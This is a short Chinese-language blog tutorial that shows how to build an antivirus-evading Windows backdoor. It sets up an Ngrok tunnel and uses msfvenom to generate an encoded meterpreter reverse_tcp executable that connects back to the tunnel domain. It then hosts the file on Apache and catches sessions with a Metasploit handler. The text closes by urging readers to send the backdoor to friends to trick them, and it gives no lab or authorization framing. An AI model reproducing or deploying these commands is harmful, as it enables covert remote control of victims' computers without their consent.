渗透测试(二)-Metasploit生成免杀后门(外网篇)


1. Sunny-Ngrok 开通隧道

  1. 首先在官网注册会员
  2. 登陆
  3. 选择要开通的服务器
  4. 这里我们选择美国Ngrok免费服务器

?

?

选择tcp协议,填一个可以使用的端口号。

?

开通隧道后可以在 隧道管理 中看到自己的隧道信息:

记住这里的 隧道id赠送域名 以及 隧道端口,下面会用到。

?

2. 启动隧道

首先在kali linux中下载对应的客户端,选择Linux 64位版本。

?

启动隧道:

./sunny clientid 隧道id

启动多个隧道:

./sunny clientid 隧道id,隧道id

要想后台运行可以使用 setsid 命令:

setsid ./sunny clientid 隧道id &

隧道连接成功后会显示:

?

3. 生成后门

sudo su
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=10716 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/shell.exe

这里和内网渗透的区别就是:将LHOST换成隧道的域名地址,将LPORT换成隧道端口。

如果想要在软件中绑定后门,按照 文中第7步就行,注意修改LHOST和LPORT

4. 监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 10716
run

 

5. 下载后门

同样打开apache服务,下载后门,然后就可以发给你的小伙伴们去坑他们了!

我的公众号!

?